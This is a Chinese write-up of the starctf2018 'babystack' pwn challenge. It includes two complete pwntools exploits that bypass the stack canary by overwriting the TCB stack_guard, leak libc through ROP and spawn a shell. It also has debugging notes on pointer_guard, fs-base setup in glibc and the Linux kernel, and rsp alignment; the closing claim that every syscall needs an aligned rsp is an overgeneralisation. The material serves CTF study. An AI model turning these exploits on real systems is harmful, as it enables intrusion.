题目

这道题是来自starctf2018的一道pwn题，主要是通过覆盖TCB结构体中的stack_guard值来bypass Canary的校验过程

赛题链接: https://github.com/sixstars/starctf2018/tree/master/pwn-babystack

TCB介绍: http://www.openwall.com/lists/oss-security/2018/02/27/5

环境

Ubuntu 18.04 64位
libc-2.27

解题

由于大致了解解题细节，所以我就直接拿现成的exp来先运行试一下，如下

#!/usr/bin/python

from pwn import *

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'INFO'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666

def debug(command=''):
    gdb.attach(p, command)

def exploit():
    #debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')
    log.info("pop_rdi:     " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave:       " + hex(leave))

    size = 8300
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A'*0x1010
    # stack pivot #step 1
    payload += p64(fakebuf)
    # ROP1 - leak libc 
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read 
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot #step 2
    payload += p64(leave)
   	# Override TCB Canary
    payload = payload.ljust(size, 'A')
    
    p.send(payload)
    p.recvuntil('goodbye.\n')
    leak = p.recvline().strip()[-6:].ljust(8, '\0')
    leak = u64(leak)
    libc.address = leak - libc.sym['puts']
    info("%#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']
    
    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)

    p.send(payload)
    p.interactive()

if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path]) #, env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

这里我没有使用官方的libc(主要是我没找到。。)，直接使用了系统的libc

主要的过程在注释里写的差不多了，大致上就是

计算偏移，先填充0x1010个“A”至rbp(这一步同时覆盖了栈上的Canary为“AAAA”)
stack pivot劫持rbp至.bss段
由于libc默认PIE，所以需要调用puts函数leak出puts函数在got表的绝对地址
寻找pop_rsi_pop、pop_rdi等一系列gadget，控制寄存器，准备调用read函数的参数
根据puts leak出的puts函数在got表的绝对地址，计算偏移得到libc的基地址，并基于libc的基地址算出read函数的绝对地址
构造ROP，用“A”填充ROP至8300个字节(这一步同时利用超长的“A”，覆盖了TCB中的stack_guard值为“AAAA”，从而绕过Canary的校验)
将ROP填入栈上对应位置
在我们填入的read函数被调用时，将真正的exp通过read函数写入.bss上被劫持的栈
最后leave，将栈完全劫持到.bss段执行

过程还是比较明了的，于是我运行了一下

然而，这个exp在我的机器上并不能成功的getshell，但是，在ubuntu 16.04上却可以成功getshell。

疑惑.jpg，话不多说，gdb搞起

WHY?

gdb单步调试至我们最终执行的payload处

首先，可以看到程序确实被劫持到了system函数，并且rdi确实指向了“/bin/sh”字符串

enter_system

看上去一切正常，继续跟进去看看

当我调试到这一步时，程序崩溃了

rax_gg

可以看到，<do_system+359> call rax尝试调用rax寄存器所指向的函数

但仔细看一下rax的值，可以发现为0x74e75a79b3d1d1ee，远远超出了可以访问的内存地址空间

所以自然而然的，程序在此崩溃

那么为什么会出现这么异常的rax值呢？

我把目光放在了前面的一段汇编代码上，即<do_system+343> xor rax, QWORD PTR fs:0x30

我将0x74e75a79b3d1d1ee与xor之前的rax的值0x35a61b38f29090af进行xor，得到了fs:0x30的值为0x4141414141414141

看到这，可能有人还是不理解，这里贴一下64位程序中TCB的结构

typedef struct
{
  void *tcb;                /* Pointer to the TCB.  Not necessarily the
                           thread descriptor used by libpthread.  */
  dtv_t *dtv;
  void *self;                /* Pointer to the thread descriptor.  */
  int multiple_threads;
  int gscope_flag;  // 32位下没有这个成员
  uintptr_t sysinfo;
  uintptr_t stack_guard;
  uintptr_t pointer_guard;
  unsigned long int vgetcpu_cache[2];
  /* Bit 0: X86_FEATURE_1_IBT.
     Bit 1: X86_FEATURE_1_SHSTK.
   */
  unsigned int feature_1;
  int __glibc_unused1;
  /* Reservation of some values for the TM ABI.  */
  void *__private_tm[4];
  /* GCC split stack support.  */
  void *__private_ss;
  /* The lowest address of shadow stack,  */
  unsigned long long int ssp_base;
  /* Must be kept even if it is no longer used by glibc since programs,
     like AddressSanitizer, depend on the size of tcbhead_t.  */
  __128bits __glibc_unused2[8][4] __attribute__ ((aligned (32)));
  void *__padding[8];
} tcbhead_t;

看到这儿想必大家也知道了原因，由于fs:0x28处就是stack_guard，而原payload在没有计算任何偏移的情况下暴力覆盖了8300个字节，在覆盖stack_guard的同时也将fs:0x30处的pointer_guard覆盖为了0x4141414141414141而在libc2.27中的system函数在实现过程中需要利用这个值做指针的解密，解密的过程可以在图中的汇编看到，我这里总结一下(⊕ 为异或)

1 2	ptr(enc) = ror64(ptr(orig) ⊕ rand, 0x11) // rand的值就是pointer_guard的值 ptr(orig) = rol64(ptr(enc), 0x11) ⊕ rand

在windows上，解密方法则有些不一样

1 2	ptr(enc) = ror64(ptr(orig) ⊕ rand, rand) ptr(orig) = rol64(ptr(enc), rand) ⊕ rand

这里也简单说一下pointer_guard的用处，pointer_guard旨在保护存储在用户可读写的内存当中的函数地址，防止攻击者读出真实函数地址，从而绕过类似aslr等一系列防护机制

我们可以从上面的两种解密方法发现，windows和linux的加解密方法是一致的(除了0x11)，但实际上，linux以及windows在这个rand值上的处理也是有很大的区别的

在我们的漏洞利用中，我们实际上通过栈溢出覆盖了这个rand值(也就是pointer_guard)

换句话说，linux将这个rand值保存在了TCB中，而TCB实际上也可以被用户访问并改写

而windows则不然，windows将这个值存在了kernel中，用户无法对其修改读取(有kernel的洞就当我没说

所以实际上linux对此机制的实现是不安全的(同理，stack_guard也与pointer_guard一样)

那么由于解密失败，于是便触发了崩溃。

那要解决这个问题其实很简单，我们可以看到，stack_guard在相对于pointer_guard的低位，所以我们只需要精确计算出需要覆盖的偏移量，仅覆盖至stack_guard即可

通过命令x/32gx pthread_self()我查看到了TCB的结构以及其地址，确定了stack_guard与溢出点buf之间的偏移

TIPS：在gdb中，你是无法直接查看到fs寄存器真正指向的地址的，~~这是由于在保护模式下fs寄存器中保存的将不再是基地址，而是段选择子，需要基于此值去gdt或者ldt中查表才可以得到真正的基地址，~~ 这是由于我们所能看到的所有段寄存器的16位数值都是段选择子，而不是真正的基地址，真正的基地址是我们不可见的，需要使用段选择子的值去gdt或者ldt中查表才可以得到我们不可见的基地址，但是fs/gs寄存器是个例外(在linux x86_64系统上)，他们与其他四个段寄存器在保护模式下的表现是不一样的，我们可见的fs/gs的16位数值将不是如同其他四个段寄存器一般是段选择子，而是恒为0(在linux x86_64系统上运行的64位程序)，但是，我们又知道fs寄存器中保存着不可见的线程TCB的起始地址，那么在恒为0的情况下，是谁来改变这个不可见的线程TCB的起始地址呢？

~~答案是cpu在进行线程切换时会使用wrmsr直接修改fs段寄存器的值为当前线程的TCB的起始地址~~

调试后发现是由glibc在线程启动之前主动调用了TLS_INIT_TP -> arch_prctl(syscall)从而改变了fs寄存器的基地址，下面是部分代码

/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.

   We have to make the syscall for both uses of the macro since the
   address might be (and probably is) different.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);					      \
     tcbhead_t *_head = _thrdescr;					      \
     int _result;							      \
									      \
     _head->tcb = _thrdescr;						      \
     /* For now the thread descriptor is at the same address.  */	      \
     _head->self = _thrdescr;						      \
									      \
     /* It is a simple syscall to set the %fs value for the thread.  */	      \
     asm volatile ("syscall"						      \
		   : "=a" (_result)					      \
		   : "0" ((unsigned long int) __NR_arch_prctl),		      \
		     "D" ((unsigned long int) ARCH_SET_FS),		      \
		     "S" (_thrdescr)					      \
		   : "memory", "cc", "r11", "cx");			      \
									      \
    _result ? "cannot set %fs base address for thread-local storage" : 0;     \
  })
  ......
  // arch_prctl系统调用实现代码
  long do_arch_prctl(struct task_struct *task, int code, unsigned long addr)
{
	int ret = 0;
	int doit = task == current;
	int cpu;

	switch (code) {
	case ARCH_SET_GS:
		if (addr >= TASK_SIZE_OF(task))
			return -EPERM;
		cpu = get_cpu();
		/* handle small bases via the GDT because that's faster to
		   switch. */
		if (addr <= 0xffffffff) {
			set_32bit_tls(task, GS_TLS, addr);
			if (doit) {
				load_TLS(&task->thread, cpu);
				load_gs_index(GS_TLS_SEL);
			}
			task->thread.gsindex = GS_TLS_SEL;
			task->thread.gs = 0;
		} else {
			task->thread.gsindex = 0;
			task->thread.gs = addr;
			if (doit) {
				load_gs_index(0);
				ret = wrmsrl_safe(MSR_KERNEL_GS_BASE, addr);
			}
		}
		put_cpu();
		break;
	case ARCH_SET_FS:
		/* Not strictly needed for fs, but do it for symmetry
		   with gs */
		if (addr >= TASK_SIZE_OF(task))
			return -EPERM;
		cpu = get_cpu();
		/* handle small bases via the GDT because that's faster to
		   switch. */
		if (addr <= 0xffffffff) { // qemu+64位kernel+busybox+64位可执行程序情况下会进到这个分支，这应该是特殊情况，正式发行版并不会这样
			set_32bit_tls(task, FS_TLS, addr); // 如果是传入的地址为32位，那么说明仍是段寻址，更新gdt中对应段描述符的值(虽然这里是fill_ldt)，从而间接改变基地址
			if (doit) { 
				load_TLS(&task->thread, cpu);
				loadsegment(fs, FS_TLS_SEL);
			}
			task->thread.fsindex = FS_TLS_SEL;
			task->thread.fs = 0;
		} else {
			task->thread.fsindex = 0;
			task->thread.fs = addr;
			if (doit) { // 如果发出系统调用的线程恰好为处理器正在执行的线程时，主动将fs置0并加载fsbase值，防止内核切换线程时重复操作
				/* set the selector to 0 to not confuse
				   __switch_to */
				loadsegment(fs, 0);  // 装载fs为0
				ret = wrmsrl_safe(MSR_FS_BASE, addr); // 与32位下的处理方式不同，这里直接改写基地址
			}
		}
		put_cpu();
		break;
    (后面省略)
   ......
static inline void set_32bit_tls(struct task_struct *t, int tls, u32 addr)
{
	struct user_desc ud = {
		.base_addr = addr,
		.limit = 0xfffff,
		.seg_32bit = 1,
		.limit_in_pages = 1,
		.useable = 1,
	};
	struct desc_struct *desc = t->thread.tls_array;
	desc += tls;
	fill_ldt(desc, &ud);
}

当然，内核也会在调度线程时执行检查，确保下一个需要被调度的线程fsindex以及其base值无误

*
 *	switch_to(x,y) should switch tasks from x to y.
 *
 * This could still be optimized:
 * - fold all the options into a flag word and test it with a single test.
 * - could test fs/gs bitsliced
 *
 * Kprobes not supported here. Set the probe on schedule instead.
 * Function graph tracer not supported too.
 */
__visible __notrace_funcgraph struct task_struct *
__switch_to(struct task_struct *prev_p, struct task_struct *next_p)
{
	struct thread_struct *prev = &prev_p->thread;
	struct thread_struct *next = &next_p->thread;
	struct fpu *prev_fpu = &prev->fpu;
	struct fpu *next_fpu = &next->fpu;
	int cpu = smp_processor_id();
	struct tss_struct *tss = &per_cpu(cpu_tss, cpu);
	unsigned fsindex, gsindex;
	fpu_switch_t fpu_switch;

	fpu_switch = switch_fpu_prepare(prev_fpu, next_fpu, cpu);

	/* We must save %fs and %gs before load_TLS() because
	 * %fs and %gs may be cleared by load_TLS().
	 *
	 * (e.g. xen_load_tls())
	 */
	savesegment(fs, fsindex);
	savesegment(gs, gsindex);

	/*
	 * Load TLS before restoring any segments so that segment loads
	 * reference the correct GDT entries.
	 */
	load_TLS(next, cpu);

	/*
	 * Leave lazy mode, flushing any hypercalls made here.  This
	 * must be done after loading TLS entries in the GDT but before
	 * loading segments that might reference them, and and it must
	 * be done before fpu__restore(), so the TS bit is up to
	 * date.
	 */
	arch_end_context_switch(next_p);

	/* Switch DS and ES.
	 *
	 * Reading them only returns the selectors, but writing them (if
	 * nonzero) loads the full descriptor from the GDT or LDT.  The
	 * LDT for next is loaded in switch_mm, and the GDT is loaded
	 * above.
	 *
	 * We therefore need to write new values to the segment
	 * registers on every context switch unless both the new and old
	 * values are zero.
	 *
	 * Note that we don't need to do anything for CS and SS, as
	 * those are saved and restored as part of pt_regs.
	 */
	savesegment(es, prev->es);
	if (unlikely(next->es | prev->es))
		loadsegment(es, next->es);

	savesegment(ds, prev->ds);
	if (unlikely(next->ds | prev->ds))
		loadsegment(ds, next->ds);

	/*
	 * Switch FS and GS.
	 *
	 * These are even more complicated than DS and ES: they have
	 * 64-bit bases are that controlled by arch_prctl.  Those bases
	 * only differ from the values in the GDT or LDT if the selector
	 * is 0.
	 *
	 * Loading the segment register resets the hidden base part of
	 * the register to 0 or the value from the GDT / LDT.  If the
	 * next base address zero, writing 0 to the segment register is
	 * much faster than using wrmsr to explicitly zero the base.
	 *
	 * The thread_struct.fs and thread_struct.gs values are 0
	 * if the fs and gs bases respectively are not overridden
	 * from the values implied by fsindex and gsindex.  They
	 * are nonzero, and store the nonzero base addresses, if
	 * the bases are overridden.
	 *
	 * (fs != 0 && fsindex != 0) || (gs != 0 && gsindex != 0) should
	 * be impossible.
	 *
	 * Therefore we need to reload the segment registers if either
	 * the old or new selector is nonzero, and we need to override
	 * the base address if next thread expects it to be overridden.
	 *
	 * This code is unnecessarily slow in the case where the old and
	 * new indexes are zero and the new base is nonzero -- it will
	 * unnecessarily write 0 to the selector before writing the new
	 * base address.
	 *
	 * Note: This all depends on arch_prctl being the only way that
	 * user code can override the segment base.  Once wrfsbase and
	 * wrgsbase are enabled, most of this code will need to change.
	 */
	if (unlikely(fsindex | next->fsindex | prev->fs)) { // 执行检查
		loadsegment(fs, next->fsindex);

		/*
		 * If user code wrote a nonzero value to FS, then it also
		 * cleared the overridden base address.
		 *
		 * XXX: if user code wrote 0 to FS and cleared the base
		 * address itself, we won't notice and we'll incorrectly
		 * restore the prior base address next time we reschdule
		 * the process.
		 */
		if (fsindex)
			prev->fs = 0;
	}
	if (next->fs) // 如果不为0，则直接更新fsbase的值
		wrmsrl(MSR_FS_BASE, next->fs);
	prev->fsindex = fsindex;

	if (unlikely(gsindex | next->gsindex | prev->gs)) {
		load_gs_index(next->gsindex);

		/* This works (and fails) the same way as fsindex above. */
		if (gsindex)
			prev->gs = 0;
	}
	if (next->gs)
		wrmsrl(MSR_KERNEL_GS_BASE, next->gs);
	prev->gsindex = gsindex;

	switch_fpu_finish(next_fpu, fpu_switch);

	/*
	 * Switch the PDA and FPU contexts.
	 */
	this_cpu_write(current_task, next_p);

	/* Reload esp0 and ss1.  This changes current_thread_info(). */
	load_sp0(tss, next);

	/*
	 * Now maybe reload the debug registers and handle I/O bitmaps
	 */
	if (unlikely(task_thread_info(next_p)->flags & _TIF_WORK_CTXSW_NEXT ||
		     task_thread_info(prev_p)->flags & _TIF_WORK_CTXSW_PREV))
		__switch_to_xtra(prev_p, next_p, tss);

	if (static_cpu_has_bug(X86_BUG_SYSRET_SS_ATTRS)) {
		/*
		 * AMD CPUs have a misfeature: SYSRET sets the SS selector but
		 * does not update the cached descriptor.  As a result, if we
		 * do SYSRET while SS is NULL, we'll end up in user mode with
		 * SS apparently equal to __USER_DS but actually unusable.
		 *
		 * The straightforward workaround would be to fix it up just
		 * before SYSRET, but that would slow down the system call
		 * fast paths.  Instead, we ensure that SS is never NULL in
		 * system call context.  We do this by replacing NULL SS
		 * selectors at every context switch.  SYSCALL sets up a valid
		 * SS, so the only way to get NULL is to re-enter the kernel
		 * from CPL 3 through an interrupt.  Since that can't happen
		 * in the same task as a running syscall, we are guaranteed to
		 * context switch between every interrupt vector entry and a
		 * subsequent SYSRET.
		 *
		 * We read SS first because SS reads are much faster than
		 * writes.  Out of caution, we force SS to __KERNEL_DS even if
		 * it previously had a different non-NULL value.
		 */
		unsigned short ss_sel;
		savesegment(ss, ss_sel);
		if (ss_sel != __KERNEL_DS)
			loadsegment(ss, __KERNEL_DS);
	}

	return prev_p;
}

在更新版本的内核中，arch_prctl将只为x86_64系统上运行的64位程序提供调用，其余的(x86_64下的32位程序,x86下的32位程序)将不能再依靠arch_prctl来更新fs/gs，这一点也可以从glibc针对32位程序的TLS_INIT_TP实现方式中看出，如下

/* Code to initially initialize the thread pointer.  This might need
   special attention since 'errno' is not yet available and if the
   operation can cause a failure 'errno' must not be touched.  */
# define TLS_INIT_TP(thrdescr) \
  ({ void *_thrdescr = (thrdescr);					      \
     tcbhead_t *_head = _thrdescr;					      \
     union user_desc_init _segdescr;					      \
     int _result;							      \
									      \
     _head->tcb = _thrdescr;						      \
     /* For now the thread descriptor is at the same address.  */	      \
     _head->self = _thrdescr;						      \
     /* New syscall handling support.  */				      \
     INIT_SYSINFO;							      \
									      \
     /* Let the kernel pick a value for the 'entry_number' field.  */	      \
     tls_fill_user_desc (&_segdescr, -1, _thrdescr);			      \
									      \
     /* Install the TLS.  */						      \
     INTERNAL_SYSCALL_DECL (err);					      \
     _result = INTERNAL_SYSCALL (set_thread_area, err, 1, &_segdescr.desc);   \
									      \
     if (_result == 0)							      \
       /* We know the index in the GDT, now load the segment register.	      \
	  The use of the GDT is described by the value 3 in the lower	      \
	  three bits of the segment descriptor value.			      \
									      \
	  Note that we have to do this even if the numeric value of	      \
	  the descriptor does not change.  Loading the segment register	      \
	  causes the segment information from the GDT to be loaded	      \
	  which is necessary since we have changed it.   */		      \
       TLS_SET_GS (_segdescr.desc.entry_number * 8 + 3);		      \
									      \
     _result == 0 ? NULL						      \
     : "set_thread_area failed when setting up thread-local storage\n"; }

在32位程序中，glibc通过修改gdt中的段描述符以及gs段寄存器的值来确保gsbase指向tcb基地址(64位程序使用fs寄存器，32位程序使用gs寄存器)

并且，由于段描述符是由glibc提供，所以内核在收到INTERNAL_SYSCALL (set_thread_area, err, 1, &_segdescr.desc)所执行的请求后，除了会分配一个entry给glibc以外，也会把glibc提供的信息保存一份至该进程的task_struct -> thread -> tls_array成员中,在线程切换时，内核将会用这份保存的段描述符更新gdt表，从而实现一个entry对应N个线程

以下是部分相关代码

struct task_struct {
(无关成员太多，省略)
	int pagefault_disabled;
/* CPU-specific state of this task */
	struct thread_struct thread; // 此成员记录了线程的寄存器状态及tls状态等
/*
 * WARNING: on x86, 'thread_struct' contains a variable-sized
 * structure.  It *MUST* be at the end of 'task_struct'.
 *
 * Do not put anything below here!
 */
 }
......
struct thread_struct {
	/* Cached TLS descriptors: */
	struct desc_struct	tls_array[GDT_ENTRY_TLS_ENTRIES]; // 段描述符信息被保存在此成员中
  (无关成员太多，省略)
}
......
/*
 *	switch_to(x,y) should switch tasks from x to y.
 *
 * This could still be optimized:
 * - fold all the options into a flag word and test it with a single test.
 * - could test fs/gs bitsliced
 *
 * Kprobes not supported here. Set the probe on schedule instead.
 * Function graph tracer not supported too.
 */
__visible __notrace_funcgraph struct task_struct *
__switch_to(struct task_struct *prev_p, struct task_struct *next_p)
{
  struct thread_struct *prev = &prev_p->thread;
	struct thread_struct *next = &next_p->thread;
	struct fpu *prev_fpu = &prev->fpu;
	struct fpu *next_fpu = &next->fpu;
	int cpu = smp_processor_id();
	struct tss_struct *tss = &per_cpu(cpu_tss, cpu);
	unsigned fsindex, gsindex;
	fpu_switch_t fpu_switch;

	fpu_switch = switch_fpu_prepare(prev_fpu, next_fpu, cpu);

	/* We must save %fs and %gs before load_TLS() because
	 * %fs and %gs may be cleared by load_TLS().
	 *
	 * (e.g. xen_load_tls())
	 */
	savesegment(fs, fsindex);
	savesegment(gs, gsindex);
  /*
	 * Load TLS before restoring any segments so that segment loads
	 * reference the correct GDT entries.
	 */
	load_TLS(next, cpu);  // 在线程上下文切换时，更新gdt
  (省略)
}
......
#define load_TLS(t, cpu)			native_load_tls(t, cpu)
......
static inline void native_load_tls(struct thread_struct *t, unsigned int cpu)
{
	struct desc_struct *gdt = get_cpu_gdt_table(cpu);
	unsigned int i;
  // 更新gdt，使对应的段描述符变为将要执行的线程的段描述符
	for (i = 0; i < GDT_ENTRY_TLS_ENTRIES; i++)
		gdt[GDT_ENTRY_TLS_MIN + i] = t->tls_array[i];
}

另外，在调试的过程中也遇到了一个奇怪的问题，在qemu+64位kernel+busybox+64位可执行程序的情况下，虽然执行的是64位程序，但是arch_prctl中设置的地址居然是32位地址，然而在正常的ubuntu发行版上却没有这个问题，之后可以再看看原因

顺便总结一下我调试的时候遇到的不同情况，这些不同情况的原理都在上面的代码和注释中写明了

qemu+64位老版kernel+busybox+64位可执行程序(glib 2.27+gcc 7.5.0编译)

此时arch_prctl设置fs的地址为32位地址，fs因此被设置为0x63，gs为0x0，并没有直接通过WRMSR修改fs寄存器的基地址，而是使用段寻址方式
qemu+64位老版kernel+busybox+32位可执行程序(glib 2.27+gcc 7.5.0编译)

此时不调用arch_prctl，使用glibc针对32系统TLS_INIT_TP修改了gs为0x63，fs保持不变为0x0，并没有直接通过WRMSR修改gs寄存器的基地址，而是使用段寻址方式
发行版64位ubuntu(新版内核)+32位可执行程序(glib 2.27+gcc 7.5.0编译)

此时不调用arch_prctl，使用glibc针对32系统TLS_INIT_TP修改了gs为0x63，fs保持不变为0x0，与第二种情况是一致的
发行版64位ubuntu(新版内核)+64位可执行程序(glib 2.27+gcc 7.5.0编译)

此时arch_prctl设置fs的地址为64位地址，fs因此被设置为0x0，gs也为0x0，arch_prctl中直接通过WRMSR修改了fs寄存器的基地址，不使用段寻址方式

关于cpu是如何更改fs寄存器的，以下是摘录自[AMD Architecture Programmer's Manual Volume 2: System Programming](https://www.amd.com/system/files/TechDocs/24593.pdf#page=124), section 4.5.3，在内核的实现中，我们可以看到第一种方法被应用

FS and GS Registers in 64-Bit Mode. Unlike the CS,DS,ES, and SS segments, the FS and GS segment overrides can   
be used in 64-bit mode. When FS and GS segment overrides are used in 64-bit mode, their respective base addresses are used in the effective-address (EA) calculation. The complete EA calculation then becomes (FS or GS).base + base + (scale * index) + displacement. The FS.base and GS.base values are also expanded to the full 64-bit virtual-address size, as shown in Figure 4-5. The resulting EA calculation is allowed to wrap across positive and negative addresses.


[...]

There are two methods to update the contents of the FS.base and GS.base hidden descriptor fields. The first is available exclusively to privileged software (CPL = 0). The FS.base and GS.base hidden descriptor-register fields are mapped to MSRs. Privileged software can load a 64-bit base address in canonical form into FS.base or GS.base using a single WRMSR instruction. The FS.base MSR address is C000_0100h while the GS.base MSR address is C000_0101h.

The second method of updating the FS and GS base fields is available to software running at any privilege level (when supported by the implementation and enabled by setting CR4[FSGSBASE]). The WRFSBASE and WRGSBASE instructions copy the contents of a GPR to the FS.base and GS.base fields respectively. When the operand size is 32 bits, the upper doubleword of the base is cleared. WRFSBASE and WRGSBASE are only supported in 64-bit mode.

所以这里借助x/32gx pthread_self()来访问

下面是pthread_self()及其相关关键结构的实现(在linux x86_64系统上),可以看到实际上这个函数是取了fs:(结构体pthread中header.self成员的偏移)，而我们由上面的知识可以知道，fs在这里代表TCB的起始地址，那么加上结构体pthread中header.self成员的偏移，就相当于取tcbhead_t中self成员的值，这个值指向TCB的起始地址

pthread_t
pthread_self (void)
{
  return (pthread_t) THREAD_SELF;
}

......
  
// 这是64位下的THREAD_SELF
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
	pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;						      \
     asm ("mov %%fs:%c1,%0" : "=r" (__self)				      \
	  : "i" (offsetof (struct pthread, header.self)));	 	      \
     __self;})
  
......
  
//这是32位下的THREAD_SELF
/* Return the thread descriptor for the current thread.

   The contained asm must *not* be marked volatile since otherwise
   assignments like
	pthread_descr self = thread_self();
   do not get optimized away.  */
# define THREAD_SELF \
  ({ struct pthread *__self;						      \
     asm ("movl %%gs:%c1,%0" : "=r" (__self)				      \
	  : "i" (offsetof (struct pthread, header.self)));		      \
     __self;})
  
......
  
/* Thread descriptor data structure.  */
struct pthread
{
  union
  {
#if !TLS_DTV_AT_TP
    /* This overlaps the TCB as used for TLS without threads (see tls.h).  */
    tcbhead_t header; // tcbhead_t结构在本章前面有介绍
#else
    struct
    {
      /* multiple_threads is enabled either when the process has spawned at
	 least one thread or when a single-threaded process cancels itself.
	 This enables additional code to introduce locking before doing some
	 compare_and_exchange operations and also enable cancellation points.
	 The concepts of multiple threads and cancellation points ideally
	 should be separate, since it is not necessary for multiple threads to
	 have been created for cancellation points to be enabled, as is the
	 case is when single-threaded process cancels itself.

	 Since enabling multiple_threads enables additional code in
	 cancellation points and compare_and_exchange operations, there is a
	 potential for an unneeded performance hit when it is enabled in a
	 single-threaded, self-canceling process.  This is OK though, since a
	 single-threaded process will enable async cancellation only when it
	 looks to cancel itself and is hence going to end anyway.  */
      int multiple_threads;
      int gscope_flag;
# ifndef __ASSUME_PRIVATE_FUTEX
      int private_futex;
# endif
    } header;
#endif

那么基于此，可以修改exp如下

#!/usr/bin/python

from pwn import *

context.os = 'linux'
#context.terminal = ['tmux', 'splitw', '-h']
# ['CRITICAL', 'DEBUG', 'ERROR', 'INFO', 'NOTSET', 'WARN', 'WARNING']
context.log_level = 'DEBUG'

libc_path = '/lib/x86_64-linux-gnu/libc.so.6'
bin_path = './bs'

libc = ELF(libc_path)
binary = ELF(bin_path)

host = ''
port = 6666


def debug(command=''):
    gdb.attach(p, command)


def exploit():
    # debug('b *0x4009E7\n')
    g = lambda x: next(binary.search(asm(x, os='linux', arch='amd64')))
    pop_rdi = g('pop rdi; ret')
    pop_rsi_pop = g('pop rsi; pop r15; ret')
    leave = g('leave; ret')
    
    log.info("pop_rdi:     " + hex(pop_rdi))
    log.info("pop_rsi_pop: " + hex(pop_rsi_pop))
    log.info("leave:       " + hex(leave))

    size = 0x1850
    p.sendlineafter('send?\n', str(size))

    fakebuf = 0x602f00
    payload = ''
    payload += 'A' * 0x1010
    # stack pivot #step 1
    payload += p64(fakebuf)
    # ROP1 - leak libc
    payload += p64(pop_rdi)
    payload += p64(binary.got['puts'])
    payload += p64(binary.plt['puts'])
    # ROP2 - read
    payload += p64(pop_rdi)
    payload += p64(0)
    payload += p64(pop_rsi_pop)
    payload += p64(fakebuf)
    payload += p64(0)
    payload += p64(binary.plt['read'])
    # stack pivot #step 2
    payload += p64(leave)
    # Override TCB Canary
    payload = payload.ljust(size, 'A')
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.send(payload)
    #print("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.recvuntil('goodbye.\n')
    leak = p.recv(6)+'\x00\x00'
    leak = u64(leak)
    #info("libc.address is %#x", libc.address)
    #print("leak:", leak)
    #print("sym:", libc.symbols['puts'])
    libc.address = leak - libc.symbols['puts']

    #print("leak:",leak)
    #print("sym:",libc.symbols['puts'])
    info("libc.address is %#x", libc.address)
    bin_sh = libc.search('/bin/sh').next()
    system = libc.sym['system']

    #payload = ''
    #payload += p64(0)
    #payload += p64((libc.address+0x4f3c2))
    payload = ''
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)

    p.send(payload)
    #print ("pid " + str(proc.pidof(p)))
    #raw_input("attach me")
    p.interactive()


if __name__ == '__main__':
    if len(sys.argv) == 1:
        global p
        p = process(executable=bin_path, argv=[bin_path])  # , env={'LD_PRELOAD':libc_path})
    else:
        p = remote(sys.argv[1], int(sys.argv[2]))
    exploit()

修改了payload的长度，仅覆盖至stack_guard即可

本以为大功告成，可是事与愿违，当我再次运行exp时，仍然抛出了错误

我:????????

本以为是改的不对，计算错了偏移量，但是当我再一次gdb调试后，发现原来的错误处已经正常

also_gg

那就很奇怪了，为什么还是不行呢？

继续调试，同时我写了一个正常调用system函数的代码做对比

#include <errno.h>
#include <stdio.h>
#include <pthread.h>
#include <asm/prctl.h>
#include <sys/prctl.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void * start(){
 getchar();
 system("/bin/sh");
 return 0;
}

int main()
{
    pthread_t t;
    pthread_create(&t, NULL, &start, 0);
    if (pthread_join(t, NULL) != 0) {
        puts("exit failure");
        return 1;
    }
    puts("Bye bye");
    return 0;
}

经过长时间的调试，我发现了奇怪的地方

wired

这里显示syscall调用的是wait4()这个系统调用，如果是正常的调用system函数，程序应当在syscall执行之后阻塞，但是在执行exp时，却并没有阻塞，而是直接跳了过去，那也就是说wait4()并没有阻塞，而是直接退出了

这令我很疑惑，于是我查看了wait4()试图等待的进程pid，即rdi寄存器的值，如下

pid_gg

可以发现，wait4()想要等待的进程已经退出，成为了僵尸进程，而如果正常调用system，那么wait4()等待的进程应当如下

pid_not_gg

也就是说，system调用的/bin/sh并没有成功启动，于是，我把目光转向了之前的汇编代码，寻找启动/bin/sh的地方

很快我就找到了相关代码

start_system

可以看到这里syscall调用了clone这个系统调用，就是在这里，/bin/sh被启动了

之后我便做了对比，但是我却发现，正常情况下，当执行到此处汇编代码时，完全可以正常启动，而各个寄存器参数值与我使用exp时并无太大区别，按理说并不会无法启动

到这里算是陷入了僵局，正当我掉头发时，我突然想起了之前看过的一篇文章 https://www.cnblogs.com/Rookle/p/12871878.html

而你也可以看到，在使用exp时，当程序执行到syscall时，rsp并没有16字节对齐

于是我抱着试试看的心态，手动将rsp对齐

alignment

执行

after_align

此时rax是返回的进程pid，查看一下进程情况

clone_successfuly

可以看到，正常地启动了

那么也就是说，在syscall前，我们必须保证rsp对齐16字节

